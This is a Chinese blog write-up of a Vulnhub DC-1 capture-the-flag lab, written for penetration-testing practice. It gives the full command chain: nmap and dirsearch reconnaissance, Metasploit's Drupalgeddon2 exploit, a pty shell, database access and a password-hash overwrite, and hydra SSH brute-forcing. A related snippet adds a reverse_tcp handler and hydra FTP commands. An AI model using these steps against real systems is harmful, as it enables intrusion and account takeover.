记一次Vulnhub:DC-1 靶机 打靶详细步骤

原创 已于 2024-09-29 18:42:55 修改 · 1.9k 阅读 · 47 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#linux #运维 #服务器 #安全

于 2024-09-29 18:41:37 首次发布

记录一下DC-1靶机的打靶过程

靶机的下载地址:https://www.vulnhub.com/entry/dc-1-1,292/

使用VMware打开靶机,页面是经典Linux命令页面,就不做展示了。

寻找靶机IP和开放端口

打vulnhub靶机的常规思路:先设置靶机的网络连接模式为NAT模式方便后续使用工具去发现存活IP地址,查看靶机的物理地址。

然后使用kali自带的nmap扫描工具去探测同ip段内存活主机

nmap -sS 192.168.226.0/24

这里使用半开扫描,同样可以探测存活的主机以及主机开放端口。

稍等一会,查看探测的结果

有结果了,对比一下刚刚的物理地址得到靶机的IP地址:192.168.226.145 以及开放端口22、80、111.

既然已经打开kali了,那么常规信息收集的操作也一起做了。

信息收集-目录扫描

利用dirsearch扫描靶机目录

dirsearch 192.168.226.145

 等结果。

可以看到有一个相当熟悉的目录/robots.txt,访问一下网站首页,直接拼接/robots.txt

192.168.226.145/robots.txt

好像也没什么有用的信息,有个/user/password目录,瞅一眼。

无语,啥也没有,转战火狐去看一眼wappalyzer有没有什么有用信息

识别到了CMS,看都看到了,那就百度,去看一下有没有什么历史漏洞。

找到了,找一篇看看大概流程学习一下。

参照这位大佬的内容去了解一下这个漏洞

https://blog.youkuaiyun.com/weixin_42742658/article/details/112479848

回归主题,既然这个CMS存在漏洞,直接利用kali自带的工具msfconsole利用一下

需要详细学习msfconsole工具的作用及用法的可以去参考这个博主,很详细

https://blog.youkuaiyun.com/weixin_45588247/article/details/119614618

利用msfconsole去查找历史漏洞

kali使用msfconsole

msfconsole

利用msfconsole去搜索一下这个CMS漏洞

search Drupal

有不少历史漏洞,那就选一个时间最近的去利用

use exploit/unix/webapp/drupal_drupalgeddon2

查看一下基本信息

show options

添加攻击的主机地址

set RHOSTS 192.168.226.145

再次show一下

可以看到,攻击主机已经加上去了,可以直接攻击了去拿shell了,run和exploit皆可。

exploit

拿到shell以及交互式shell

成功之后直接输入shell一下就能拿到shell,命令测试一下

存在文件flag1.txt文件。

测试成功了,这个shell还不太够看,传一个bash来实现交互式的shell

python -c 'import pty; pty.spawn("/bin/bash")'

得到交互式shell之后查看一下flag1.txt的内容。

cat flag1.txt

啥都没呢

那就直接瞅一眼配置文件

cat `find / -name settings.php`

有一个flag2.txt文件和一个数据库的配置文件,到此我们已经获得了两个flag.txt文件

继续探索

很明显,数据库文件里有账号密码

读取数据库

使用本地或者kali去连接一下

mysql -udbuser -pR0ck3t

连接成功,去看看他数据库里有什么东西

有关于用户的内容,去看看

有三个用户的账户,包括用户名和密码,太长了,而且一看就被编码了,还得调距离去解密还不一定能解出来,怎么办呢?

改密码,改就完了。

利用数据库修改密码去登录用户

详细方法去看这篇文章:分享:忘记Drupal的管理员密码的解决办法 | Drupal China

这里就直接改了:

Drupal7加密脚本所在位置

/var/www/scripts/password-hash.sh

直接修改密码:

php /var/www/scripts/password-hash.sh 123456

记得记一下这个哈希值,一会要用

直接mysql(这里kali的话最好开两个命令执行窗口操作,不然还得退出mysql再次连接进入)中修改密码

use drupaldb;update users set pass = "$S$D1UQvb3x7lKoCSX6S9K.r.wB202Lsa/r7fkOj7CelJsSEMFDJjGv" where name = 'admin' or name = 'Fred';

修改成功了,去他主页直接登录

登陆成功!去个人主页看看,点击功能点查看一下页面的内容发现还存在一个flag3。

看看他有啥内容

看不懂建议直接上有道翻译

大概是说需要执行命令才能了解在阴影里的文件。

既然如此,去看看/etc/passwd文件,看有没有什么东西、

发现了一个flag4,那看看/etc/shadow瞅一眼密码

...没权限

爆破密码

用九头蛇hydra工具去爆破一下密码

hydra -l flag4 -P /usr/share/wordlists/rockyou.txt.gz ssh://192.168.226.145

关于Hydra工具,不会使用的去学一下这位博主的文章:https://blog.youkuaiyun.com/m0_59598029/article/details/133217000

有结果了,密码是orange。

ssh连接查看内容

用ssh登陆一下

ssh flag4@192.168.226.145

就可以得到flag4的内容喽。

Lisoning
关注
vulnhub靶场 DC-5靶机 渗透详细过程
黑战士的博客
07-29 627
1.首先收集信息,真实ip,端口,网站目录,网站部署部件等2.利用文件包含来getshell3.查看权限,根据suid中的screen 4.5.0进行提权4.提权成功查看flag。
VulnHub靶机 DC-7 打靶 渗透详细流程
网络空间安全学习
04-22 1534
主机发现—端口扫描—目录爆破发现后台—服务探测—白盒测试(源码当中找配置文件)—ssh远程登录—邮件信息—找到备份文件脚本—发现脚本当中的drush命令—修改后台密码—进入后台—寻找可代码执行或getshell地方—drupal8不允许执行命令(模块)—下载新的插件—getshell—反弹shell—追加反弹命令—提权即可。由于我们上一步骤已经得到了backups.sh脚本属主为root,属组为www-data,所以我们将反弹shell命令添加到脚本当中,等待执行脚本反弹shell即可得到root权限。
Vulnhub 靶机实战系列 DC-3靶机
网络空间安全学习
04-15 1310
发现网站管理后台等信息,结合浏览器插件发现使用joomla CMS,使用kali当中jooscn工具进行扫描,如果没有安装即可。点击新建文件即可,在html/处新建php文件,也可上传,但是不一定成功,可以创建文件后将代码复制进去。根据前面信息收集到的内容,采用得CMS和版本信息,进行漏洞搜索,是否有可利用的漏洞。根据漏洞信息,进行漏洞利用,查看一下文件内容,尝试利用,sqlmap爆数据库。找上传点,或者可以查看代码或可执行代码的地方,找到扩展处功能处,尝试。发现有at,可以尝试提权,但是未果。
Vulnhub-DC-7 靶机复现完整过程
Continuejww的博客
09-02 322
kali的靶攻击机IP地址:192.168.200.14DC-7靶机的IP地址:暂时未知注意:靶机和攻击机应处于一个网卡下通过MAC地址判断靶机DC-7的IP 地址。
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-9 通关详解 (附靶机搭建教程)
qq_51577576的博客
10-28 2290
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-8 通关详解 (附靶机搭建教程) 从信息收集到拿到低权限,最后提权获取最高权限,详细解读
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-8 通关详解 (附靶机搭建教程)
qq_51577576的博客
10-27 1969
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-8 通关详解 (附靶机搭建教程) 从信息收集到拿到低权限,最后提权获取最高权限,详细解读
Vulnhub靶机DC-5
m0_52328368的博客
08-27 597
vulnhub靶场系列之dc-5靶场详细步骤
VulnHub靶机渗透】七:DC-4
野原新之助
04-29 887
靶机设定Web登录界面的弱口令漏洞,以及站点存在命令执行,和sudo的不安全配置问题。VulnHub是一个安全平台,内含众多渗透测试的靶场镜像,只需要下载至本地并在虚拟机上运行,即可得到一个完整的渗透测试练习系统,每一个靶机都有相关目标去完成(万分感谢提供靶机镜像的同学)。
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-6 通关详解 (附靶机搭建教程)
qq_51577576的博客
04-12 2812
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-5 通关详解 (附靶机搭建教程) 从信息收集到拿到低权限,最后提权获取最高权限,详细解读
vulnhub靶场】Breach1打靶过程
didiplus
07-18 1540
Vulnhub是一个提供各种漏洞环境的一个靶场平台,大部分都是虚拟机镜像文件,预先设计各种漏洞需要使用VMware或者VirtualBox运行,每个镜像都有破解的目标,从启动虚拟机到获取系统的root权限和查看flag。.........
Linux:五种IO模型
2301_80894970的博客
12-27 969
本文介绍了五种I/O模型的理论概念,重点分析了非阻塞I/O和多路转接I/O模式。文章通过钓鱼的生动比喻,阐述了阻塞I/O、非阻塞I/O、信号驱动I/O、多路检测I/O和异步I/O的区别。详细讲解了select、poll和epoll三种多路转接技术的实现原理和代码示例,比较了它们的优缺点。特别深入分析了epoll的水平触发(LT)和边缘触发(ET)两种工作模式,指出ET模式必须配合非阻塞I/O使用才能发挥最佳性能。通过理论讲解和代码实现相结合的方式,全面展示了Linux系统下高效I/O处理的实现方法和技术演进
Linux上查看systemd journald日志
yinminsumeng的博客
12-26 411
Linux系统日志查看方法摘要 本文总结了systemd journal日志的多种查看方式: 基础查看:使用journalctl命令可查看全部日志,-f实时跟踪,-b显示启动日志,-o指定输出格式(如json/verbose等)。 筛选过滤: 时间筛选:--since/--until指定时间范围 服务筛选:-u按服务单元过滤 优先级筛选:-p按日志级别(0-7) 字段筛选:_PID、_UID等按进程/用户过滤 关键字搜索:-g支持正则表达式 指定文件:可通过--file查看特定日志文件,包括持久化日志、运行
基于 Linux 内核模块的字符设备互斥访问实验
weixin_57340941的博客
12-30 357
这个信号量实验是。
Linux CFS 调度器深度解析
X
12-30 675
数学模型驱动: 用 vruntime 精确量化公平性简单性: 核心算法简洁优雅, 易于理解和维护自适应性: 自动适应不同负载和工作模式可扩展性: 通过组调度支持复杂场景表5: CFS 调度器的核心优势总结维度传统调度器CFS改进效果公平性基于优先级的时间片按权重的比例公平更精确的公平分配交互性需要启发式识别自然获得良好响应交互进程响应更快吞吐量固定时间片可能浪费动态调整, 减少切换整体吞吐量提升可配置性多个复杂参数主要调整 nice 值用户接口更简单代码维护复杂启发式逻辑。
Linux(redhat7.9)安装KVM虚拟机
两拆
12-27 407
在Redhat7.9系统中通过KVM安装虚拟机
Linux 防火墙配置详解:iptables 与 firewalld 的实战指南
A5互联
12-30 930
在企业级 Linux 运维场景中,防火墙不仅是简单的“开关”,而是关系到网络安全性、业务可用性与性能边界的重要组件。本文以真实项目经验为基础,结合具体硬件配置、产品参数、代码示例和性能评估,全面讲解 `iptables` 与 `firewalld` 的架构差异、实战配置与优化方法,帮助你从一线配置走向深入的性能调优与安全设计。
如何从零开始开发 Linux 驱动程序
2501_93209230的博客
12-26 1612
对硬件设备的访问只能通过内核空间进行,而设备驱动程序可以被视为内核空间提供的一种 API,允许用户空间代码访问设备。在较早的内核版本中,内核本身的加载和卸载都是使用相同的方法,但较新的 Linux 内核版本增加了模块验证。例如,当对驱动程序管理的设备执行“打开”操作时,我执行 scull_open 函数,这相当于在系统调用中“钩住”了 open 函数。在本文中,我想和大家分享如何自学开发驱动程序:首先,阅读书籍来掌握基本概念,然后在实际应用中查找具体细节的信息。例如,我不知道驱动程序提供了哪些 API。
Linux 下开发 C/C++ 程序为什么头文件引用路径这么多和复杂
最新发布
Tipriest的博客
12-30 959
Linux系统头文件路径的复杂性源于对多架构、多语言和多版本的支持需求。/usr/include存放架构无关的C头文件,/usr/include/x86_64-linux-gnu存放x86_64架构特定的C头文件,实现Multiarch机制。C++标准库头文件则按版本和架构分层:/usr/include/c++/11存放GCC 11的通用C++头文件,/usr/include/x86_64-linux-gnu/c++/11存放架构相关的实现。这种分层结构避免了不同编译器版本和架构间的冲突,确保系统能同时支持
Linux固件:简明扼要,用您自己的语言阐述
2501_93209230的博客
12-29 836
例如,Wi-Fi/蓝牙模块中的蓝牙部分就是如此(是的,同一个模块中,蓝牙和 Wi-Fi 模块通常使用不同的固件版本)。蓝牙最初的设计是让主机通过 UART 上的 HCI 协议与控制器通信,而这正是 Linux 内核中蓝牙驱动程序的平台无关部分(我指的是内核源代码中 net/bluetooth 目录下的部分)所依赖的。然而,更多时候,厂商并不在意这一点,也没有明确声明主机和设备之间使用的协议版本。当然,这个话题还有很多其他方面,但这些都是需要进一步研究的特殊情况,通常在调试更具体的问题时才会变得有趣。
vulnhub靶机dc-1
01-11
### VulnHub DC-1 靶机 攻略 介绍 下载 #### 关于DC-1靶机 VulnHub上的DC-1靶机旨在提供给安全爱好者和渗透测试学习者一个实践平台,在此环境中可以合法地进行各种攻击尝试,从而提升技能。该虚拟环境模拟了一个存在多个已知漏洞的服务网络应用,允许参与者通过一系列挑战来获取系统的控制权并最终找到隐藏的标志文件(flag)[^1]。 #### 获取与安装 为了开始体验DC-1靶机的任务,首先需要访问[VulnHub官方网站](https://www.vulnhub.com/)搜索栏输入“DC-1”,点击进入详情页面下载对应的镜像文件(OVA格式),之后按照提示导入到支持OVA标准的虚拟化工具如VirtualBox或VMware Workstation Pro中完成部署工作[^3]。 #### 初始配置建议 启动后的DC-1默认会分配一个私有IP地址(例如:`192.168.x.x`),此时应该确保Kali Linux作为攻击端能够与其在同一局域网内通信正常;可以通过ping命令验证连通性状况良好后再继续后续操作。 #### 基础信息搜集阶段 当确认双方设备间通讯无碍后便进入了实际演练环节——即从基础的信息收集做起。这一步骤通常涉及使用Nmap扫描开放端口和服务版本探测等手段以了解目标主机概况: ```bash nmap -A <target-ip> ``` 上述指令将会返回有关远程服务器运行状态的关键情报,为下一步制定针对性策略奠定坚实的基础。 #### 进阶探索与利用路径 随着对DC-1认识程度加深,接下来便是寻找潜在的安全缺陷加以利用的过程。根据已有经验分享可知,成功建立Meterpreter回话意味着已经突破了初步防线,获得了更深层次的操作权限: ```ruby use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost <local-ip> # Kali IP address exploit ``` 以上Metasploit框架下的设置可帮助快速搭建监听服务等待来自受害者的连接请求,一旦形成稳定的交互通道即可执行更多高级功能比如浏览目录结构直至定位至预设的目标文件位置。 #### 密码破解辅助技巧 考虑到可能存在弱密码保护的情况,采用Hydra这样的暴力猜解程序配合常用用户名列表以及大型词库资源不失为一种高效的方法去揭示真实的身份凭证组合关系[^4]: ```bash hydra -L /usr/share/wordlists/user.txt -P /usr/share/wordlists/rockyou.txt.gz ftp://<target-ip> ``` 这里展示了针对FTP协议实施登录认证绕过的实例,当然具体应用场景还需视实际情况灵活调整参数选项。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值